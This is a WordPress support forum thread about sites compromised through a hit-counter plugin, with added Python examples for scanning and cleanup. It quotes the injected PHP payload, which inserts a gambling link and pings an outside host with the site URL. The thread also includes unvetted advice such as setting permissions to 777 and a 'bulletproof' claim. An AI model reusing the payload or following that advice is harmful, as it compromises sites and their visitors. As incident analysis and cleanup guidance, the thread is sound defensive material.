WordPress.org



My site hacked? (14 posts)

  1. LFGabel
    Member
    Posted 4 years ago

    Greetings,

    Not sure how or when this happened, but somehow someone was able to get into the site and add an "Online Gambling" link to the blogroll.

    I was running 2.9.2 at the time it happened and have since upgraded to 3.0.

    I only discovered the remnants of this hack when I was upgrading because I could not delete the files. Two files were placed into the wp-content directory:
    wp-content/cache/hookd/DOMAINNAME.com

    The two files were: 8b8203326e2a9c70947a and index.html, both of which had the owner permissions set so that I could not delete them.

    The index.html file was empty, but the "8b8203326e2a9c70947a" file contained the following code:

    c*entry:add_action:wp_footer:s:499:"global $wpdb;
    if (!function_exists("wp_insert_link")) {
    @include('wp-admin/includes/bookmark.php');
    }
    if(!get_option('_wp_version')) {
      if ($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.onlinegambling.eu'")==0) {
        @wp_insert_link(array("link_name" => "Online Gambling", "link_url" => "http://www.onlinegambling.eu"));
        @update_option('_wp_version', '1');
        $buffer = @file_get_contents('http://api.hookd.org/ping/' . get_option('home'));
      }
    }";:c*end

    Did this happen because of a plugin I installed, or did someone get in some other way?

    Thanks.
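Added example, not code from the thread or from WordPress: a small Python scanner for the dropped file's format. The entry grammar (`c*entry:<registrar>:<hook>:s:<len>:"<php code>";:c*end`) is inferred from the single sample quoted above and assumed to hold for other entries; the `s:<len>:"..."` part mirrors PHP's serialized-string form, so the scanner also checks that the declared length matches the body. The embedded sample is that same PHP payload re-wrapped with a correct length; the list of flagged calls and the regexes for URLs and option names are this example's own choices.

```python
import re
import sys
from pathlib import Path

# Grammar inferred from the one dropped file quoted in the thread (assumption: other
# entries follow the same shape):
#   c*entry:<registrar>:<hook>:s:<len>:"<php code>";:c*end
# The s:<len>:"..." part looks like PHP serialize() of a string, so a declared length
# that does not match the body is itself a sign of tampering or truncation.
ENTRY_RE = re.compile(
    r'c\*entry:(?P<registrar>[^:]+):(?P<hook>[^:]+):s:(?P<len>\d+):"(?P<code>.*?)";:c\*end',
    re.DOTALL,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
OPTION_RE = re.compile(r"(?:get_option|update_option|add_option)\(\s*'([^']+)'")
# Calls worth flagging inside code injected through a hook; list chosen for this example.
RISKY_CALLS = ("file_get_contents", "wp_insert_link", "include", "eval", "base64_decode")

# Constructed sample: the PHP body of the payload quoted by LFGabel, re-wrapped so that the
# declared length is correct for this string (ASCII only, so len() matches PHP's byte count).
BODY = (
    "global $wpdb;\n"
    "if (!function_exists(\"wp_insert_link\")) {\n"
    "  @include('wp-admin/includes/bookmark.php');\n"
    "}\n"
    "if(!get_option('_wp_version')) {\n"
    "  if ($wpdb->get_var(\"SELECT COUNT(link_id) FROM $wpdb->links "
    "WHERE link_url='http://www.onlinegambling.eu'\")==0) {\n"
    "    @wp_insert_link(array(\"link_name\" => \"Online Gambling\", "
    "\"link_url\" => \"http://www.onlinegambling.eu\"));\n"
    "    @update_option('_wp_version', '1');\n"
    "    $buffer = @file_get_contents('http://api.hookd.org/ping/' . get_option('home'));\n"
    "  }\n"
    "}"
)
SAMPLE = 'c*entry:add_action:wp_footer:s:%d:"%s";:c*end' % (len(BODY), BODY)


def parse_entries(text):
    """Return one dict per c*entry block in text, with the indicators pulled out of its code."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        code = m.group("code")
        entries.append({
            "registrar": m.group("registrar"),      # e.g. add_action / add_filter
            "hook": m.group("hook"),                # e.g. wp_footer
            "length_ok": int(m.group("len")) == len(code),
            "urls": sorted(set(URL_RE.findall(code))),
            "options": sorted(set(OPTION_RE.findall(code))),
            "calls": [c for c in RISKY_CALLS if c + "(" in code],
        })
    return entries


def scan_tree(root):
    """Walk a wp-content tree and return {path: entries} for files holding c*entry blocks."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        if "c*entry:" in text:
            entries = parse_entries(text)
            if entries:
                hits[str(path)] = entries
    return hits


if __name__ == "__main__":
    # With a directory argument, scan it; otherwise show the parse of the constructed sample.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_tree(target) if target else {"<constructed sample>": parse_entries(SAMPLE)}
    for path, found in results.items():
        for e in found:
            print(path, e["registrar"], e["hook"], "length_ok=%s" % e["length_ok"],
                  "urls=%s" % e["urls"], "options=%s" % e["options"], "calls=%s" % e["calls"])
```

Run it as `python scan_hookd.py /path/to/wp-content` to list every file under the tree that carries such an entry, together with the hook it attaches to, the URLs it contacts and the options it reads or writes; those option names and URLs are what to look for afterwards in the database.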

  2. Daniel Cid
    Member
    Posted 4 years ago

    Can you look at the dates of these files? This will help you see when it happened. Did you ever keep your WordPress not upgraded for a period of time?

  3. chrisaskew
    Member
    Posted 4 years ago

    I have this problem also (v 2.9.2), and my website is not published. Any explanation/resolution?

  4. chrisaskew
    Member
    Posted 4 years ago

    Further to above, my site had a bogus wp-content directory installed at the same level as the wordpress directory. When I try to reset permissions, it creates a duplicate directory the next level up, but doesn't change permissions on the original. I can rename the bogus directory, but that doesn't affect it.

    Also, I reiterate that my site is a sandbox; its URL has never been published and it has never been publicly accessed. Is there some hook in the WordPress code that allows hacking?

    BTW - the bogus files are dated 6/22/10. The plug-in I installed closest to that date is the WordPress Hit Counter v. 2.3 by Gary-Adam Shannon.

  5. esmi
    Forum Moderator
    Posted 4 years ago

    my site is a sandbox; its URL has never been published and it has never been publicly accessed

    That doesn't rule out a back door somewhere else on the server. The most recent hack wave involved any .php files - irrespective of the application.

    is there some hook in the WordPress code that allows hacking?

    Was that a serious question?

  6. chrisaskew
    Member
    Posted 4 years ago

    I assume this is WordPress related and not just a general PHP hack because it recreates a portion of the WP file structure and only appears in the WP-based website. It also coincides with the installation of the WordPress Hit Counter plug-in.

    Further to that, after uninstalling the WordPress Hit Counter plug-in, I was able to delete the bogus directories; however, the bogus Blogroll section still shows up on my site. I assumed from that that the original hack made some changes to the standard files. I looked through all the files, however, and found no modifications on or after that date except for two error logs. One of these indicated several database access errors on the 22nd, the date these problems appeared, which opens the possibility that the database was changed. I'm shooting in the dark here, though - this is not my area of expertise.

    Pardon me if I stepped on anyone's toes, but that is a serious question. I'm new to WP (which is a godsend in many ways) and I don't know if there is any way for a WP installation in normal operation to phone home (as other software packages do) or otherwise have a line of contact with the mother-ship that might be hijacked. After my further investigations, however, it seems more likely that the Hit Counter plug-in is responsible.

    I would still appreciate it if you or someone could address this hack directly and pass on any help or direction in cleaning it up.

  7. esmi
    Forum Moderator
    Posted 4 years ago

    Pardon me if I stepped on anyone's toes, but that is a serious question.

    Fair enough. If you think you've stumbled across a plugin with a bad security hole, try contacting the plugin's author first. If you think the plugin is deliberately opening up a back door and it's being hosted in the Plugin Repository on wordpress.org, please let the folks at wordpress.org know about it. Use the form at http://wordpress.org/report-bugs/ if necessary.

  8. chrisaskew
    Member
    Posted 4 years ago

    One other thing that appears to link the hack to the WordPress Hit Counter plug-in. The bogus directories initially couldn't have their permissions changed (it appeared to recreate them if changes were made). After I deleted the plug-in, I could change the permissions and delete the directories.

    Sadly, the code to insert the unwanted Blogroll entry was already hidden somewhere, so deleting the directories didn't fix the problem.

    Can someone who knows about these things tell me where and how what kind of code can be hidden to have this effect?

    Thanks.

  9. chrisaskew
    Member
    Posted 4 years ago

    After much around-poking, I found a fix which clears up the immediate symptoms. I will have to leave to those who understand the code better to say whether it also removes any trace of the threat.

    1. As above, delete the WordPress Hit Counter Plug-in

    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    In my case the hack created a separate wp-content tree at the top (WP) level, so I just deleted the whole tree. If the bogus stuff got put under the real wp-content directory (as it seems for LFGabel above), you'll have to sort out what's real and not.

    3. Delete the bogus directories and their contents.

    4. In WP-Admin/Edit Links, remove the link "www.onlinegambling.eu". If it doesn't appear there, delete its record in the WP database table wp_links.

    5. In the WP database table wp_options delete the 4 records left by the Hit Counter (wp_version and three wphc records with consecutive option ids)

    I am hoping this gets rid of any traces of the exploit, and that the wp_footer action and $buffer line become moot once the evil code (as listed in LFGabel's initial post on this thread) is gone with the deleted directories/files.

    In any case, this relieves the immediate symptoms in my installation. If someone else can shed more light on the rest of this (I don't really understand the code or the execution model here) or let me know if I've done something really stupid and destructive, I'd greatly appreciate it.
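Steps 4 and 5 above are database work, and the safest way to do them is to list the rows first and delete only what you have reviewed. The following is an added example, not chrisaskew's procedure or any WordPress code: a Python script that runs that two-pass check against the `wp_links` and `wp_options` tables. The link URL and the option name `_wp_version` come from the payload quoted in the first post (step 5 refers to it as wp_version); the `wphc` prefix for the three Hit Counter rows is an assumption, since the thread does not give their names. An in-memory sqlite3 database with constructed rows stands in for the real MySQL database; the queries use only syntax both accept.

```python
import sqlite3

# Indicators taken from the payload quoted in the thread: the URL it inserts into the
# blogroll and the option it sets as a run-once flag. WordPress core does not use an
# option named _wp_version.
GAMBLING_URL = "http://www.onlinegambling.eu"
PAYLOAD_OPTIONS = ("_wp_version",)
# Assumption: the three Hit Counter rows chrisaskew mentions share a "wphc" prefix.
PLUGIN_OPTION_PREFIX = "wphc"


def build_sample_db():
    """Constructed stand-in for a WordPress database: sqlite3 in memory, default wp_ prefix."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_links (link_id INTEGER PRIMARY KEY, link_name TEXT, link_url TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_links (link_name, link_url) VALUES (?, ?)", [
        ("WordPress.org", "http://wordpress.org/"),   # legitimate blogroll entry
        ("Online Gambling", GAMBLING_URL),            # row the payload inserts
    ])
    conn.executemany("INSERT INTO wp_options (option_name, option_value) VALUES (?, ?)", [
        ("siteurl", "http://example.com"),            # ordinary core options
        ("home", "http://example.com"),
        ("db_version", "15260"),
        ("_wp_version", "1"),                         # payload's run-once flag
        ("wphc_visits", "42"),                        # constructed plugin rows (names assumed)
        ("wphc_settings", "a:0:{}"),
        ("wphc_version", "2.3"),
    ])
    conn.commit()
    return conn


def _option_filter(options, prefix):
    """WHERE fragment matching the named options plus anything with the plugin prefix."""
    placeholders = ",".join("?" * len(options))
    sql = "option_name IN (%s) OR option_name LIKE ?" % placeholders
    return sql, (*options, prefix + "%")


def find_indicators(conn, url=GAMBLING_URL, options=PAYLOAD_OPTIONS, prefix=PLUGIN_OPTION_PREFIX):
    """Read-only pass: list the rows the cleanup would touch. Run and review this first."""
    links = conn.execute(
        "SELECT link_id, link_name, link_url FROM wp_links WHERE link_url = ?", (url,)
    ).fetchall()
    where, params = _option_filter(options, prefix)
    opts = conn.execute(
        "SELECT option_id, option_name, option_value FROM wp_options WHERE " + where, params
    ).fetchall()
    return {"links": links, "options": opts}


def remove_indicators(conn, url=GAMBLING_URL, options=PAYLOAD_OPTIONS, prefix=PLUGIN_OPTION_PREFIX):
    """Delete the rows the read-only pass found and report how many went from each table."""
    links = conn.execute("DELETE FROM wp_links WHERE link_url = ?", (url,)).rowcount
    where, params = _option_filter(options, prefix)
    opts = conn.execute("DELETE FROM wp_options WHERE " + where, params).rowcount
    conn.commit()
    return {"links": links, "options": opts}


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", find_indicators(db))
    print("removed:", remove_indicators(db))
    print("after:", find_indicators(db))
```

Two points for a real installation: the table prefix may not be `wp_`, and a database backup should be taken before the delete pass. Order also matters, for a reason visible in the payload itself: its code inserts the link and sets `_wp_version` whenever it runs and finds that option unset, so deleting the rows while the dropped file and the plugin are still in place just brings the link back on the next page view. Remove the files first (steps 1 to 3), then the rows.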

  10. Allegro51
    Member
    Posted 4 years ago

    I am in melt-down over this hack, and can barely understand the fix instructions. I was doing it late at night - installing WP Hit Counter - and I immediately noticed that there were like 1400 files, and I knew in my gut there was something very wrong! My client is going to have a stroke if they see that there!

    In chrisaskew's instructions I am stuck at step 2:
    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    In my case the hack created a separate wp-content tree at the top (WP) level, so I just deleted the whole tree. If the bogus stuff got put under the real wp-content directory (as it seems for LFGabel above), you'll have to sort out what's real and not.

    I have no clue what he is talking about with the permissions!

    Can someone tell me how just to get the Blogroll with the gambling link off the page, and then I can try to get to deeper fixing later?

    I am assuming that my regular WordPress data backup file is worthless for this purpose?

    Any help would be most appreciated - I must get that blogroll off there before ANYONE sees it or my life is toast!

  11. Allegro51
    Member
    Posted 4 years ago

    Addendum: Has anyone filed a report on this horrific plug-in. It is the FIRST site counter that appears when you search for one. Why hasn't it been taken down yet? And here I thought if the plug-in was gotten through WP it would be safe; not to mention, the one that came up at the top of the list with good reviews.

  12. Allegro51
    Member
    Posted 4 years ago

    I was able to get the Blogroll with the gambling link off my site just by going to Admin - Edit Links and deleting it. I did of course delete the plug-in. But other than that, I have no clue what else to do.

    Is the offending gambling link going to come back, if all I did was delete the plug-in and kill the gambling link in the Edit Links list?

    In these instructions from this thread - I don't even have a cache folder under wp-content
    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    Mainly I need to know if any ongoing damage will happen, I am already in a nightmare situation with this client. Thanks!

  13. gashannon
    Member
    Posted 4 years ago

    Allegro,

    I'm updating the plugin now and have identified the source of problems... version 2.5 will be live shortly which removes an autoupdate script that was hijacked.

    If you update to 2.5 the plugin will be bulletproof and no problems at all

    Cheers

  14. gashannon
    Member
    Posted 4 years ago

    The issue has been addressed - version 2.5 fixes this hack and is bulletproof now

  15. LuckyLester
    Member
    Posted 4 years ago

    I have never installed this plugin on any of my WP blogs and yet several of them are getting blog roll links added to them as well.

    Also, I have checked several of them and one of them contains the folders or files as described above.

    Personally I think that this exploit is getting in some other way. All of the blogs that are experiencing this problem are all running on 2.9.2 and none of the blogs I have that are upgraded to 3.0 seem to be having this problem.

    I changed the passwords to a good many of them and since then they have not returned.

    Another thing I noticed is that some receive 1 link and others have had as many as 4 links added.

    Not sure if any of this has helped but just wanted to share some observations.

Topic Closed
